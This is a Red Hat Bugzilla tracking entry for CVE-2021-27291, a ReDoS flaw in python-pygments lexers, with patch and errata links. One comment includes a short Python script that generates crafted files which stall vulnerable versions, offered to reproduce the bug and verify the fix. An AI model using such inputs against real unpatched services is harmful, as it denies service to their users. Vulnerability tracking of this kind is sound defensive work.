Bug 1940603 (CVE-2021-27291) - CVE-2021-27291 python-pygments: ReDoS in multiple lexers
Summary: CVE-2021-27291 python-pygments: ReDoS in multiple lexers
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2021-27291
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 1940605 CVE-2021-20270 1940604 1943458 1943459 1943460 1943462 1943463 1943464 1944269 1969503
Blocks: 1940606
TreeView+ depends on / blocked
 
Reported: 2021-03-18 17:33 UTC by Guilherme de Almeida Suckevicz
Modified: 2021-11-09 17:25 UTC (History)
34 users (show)

Fixed In Version: python-pygments 2.7.4
Doc Type: If docs needed, set a value
Doc Text:
A denial of service attack was discovered against pygments. Some of the regular expressions used to tokenise source code for highlighting have exponential complexity. A specially crafted input file could cause pygments to take effectively infinite time to parse, consuming CPU resources and denying access to the service.
Clone Of:
Environment:
Last Closed: 2021-08-24 15:35:03 UTC


Attachments (Terms of Use)


Links
System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2021:3252 0 None None None 2021-08-24 08:05:32 UTC
Red Hat Product Errata RHSA-2021:4139 0 None None None 2021-11-09 17:21:09 UTC
Red Hat Product Errata RHSA-2021:4150 0 None None None 2021-11-09 17:24:57 UTC
Red Hat Product Errata RHSA-2021:4151 0 None None None 2021-11-09 17:25:14 UTC

Description Guilherme de Almeida Suckevicz 2021-03-18 17:33:03 UTC
In pygments 1.1+, fixed in 2.7.4, the lexers used to parse programming languages rely heavily on regular expressions. Some of the regular expressions have exponential or cubic worst-case complexity and are vulnerable to ReDoS. By crafting malicious input, an attacker can cause a denial of service.

Reference:
https://gist.github.com/b-c-ds/b1a2cc0c68a35c57188575eb496de5ce

Upstream patch:
https://github.com/pygments/pygments/commit/2e7e8c4a7b318f4032493773732754e418279a14

Comment 1 Guilherme de Almeida Suckevicz 2021-03-18 17:33:49 UTC
Created python-pygments tracking bugs for this issue:

Affects: fedora-all [bug 1940604]


Created python3-pygments tracking bugs for this issue:

Affects: epel-7 [bug 1940605]

Comment 3 Tapas Jena 2021-03-29 07:18:26 UTC
The AAP is affected by this vulnerability, however it has been fixed in the recent release i.e. 1.2.2 .

Comment 7 Lumír Balhar 2021-04-23 06:05:18 UTC
Simple Python script to generate at least a few malicious files as described upstream:

```
with open("test.m", mode="w") as file:
    print('function' + ' ' * 400, file=file)

with open("test.vcl", mode="w") as file:
    print('backend x{.a=' + ' ' * 3456, file=file)

with open("test.factor", mode="w") as file:
    print('"""'+ " " * 3456, file=file)
```

With these files, vulnerable pygments runs for tens of seconds but the fixed one is done in less than half a second.

Comment 10 errata-xmlrpc 2021-08-24 08:05:30 UTC
This issue has been addressed in the following products:

  Red Hat Software Collections for Red Hat Enterprise Linux 7
  Red Hat Software Collections for Red Hat Enterprise Linux 7.7 EUS

Via RHSA-2021:3252 https://access.redhat.com/errata/RHSA-2021:3252

Comment 11 Product Security DevOps Team 2021-08-24 15:35:03 UTC
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2021-27291

Comment 12 errata-xmlrpc 2021-11-09 17:21:06 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2021:4139 https://access.redhat.com/errata/RHSA-2021:4139

Comment 13 errata-xmlrpc 2021-11-09 17:24:55 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2021:4150 https://access.redhat.com/errata/RHSA-2021:4150

Comment 14 errata-xmlrpc 2021-11-09 17:25:11 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2021:4151 https://access.redhat.com/errata/RHSA-2021:4151


Note You need to log in before you can comment on or make changes to this bug.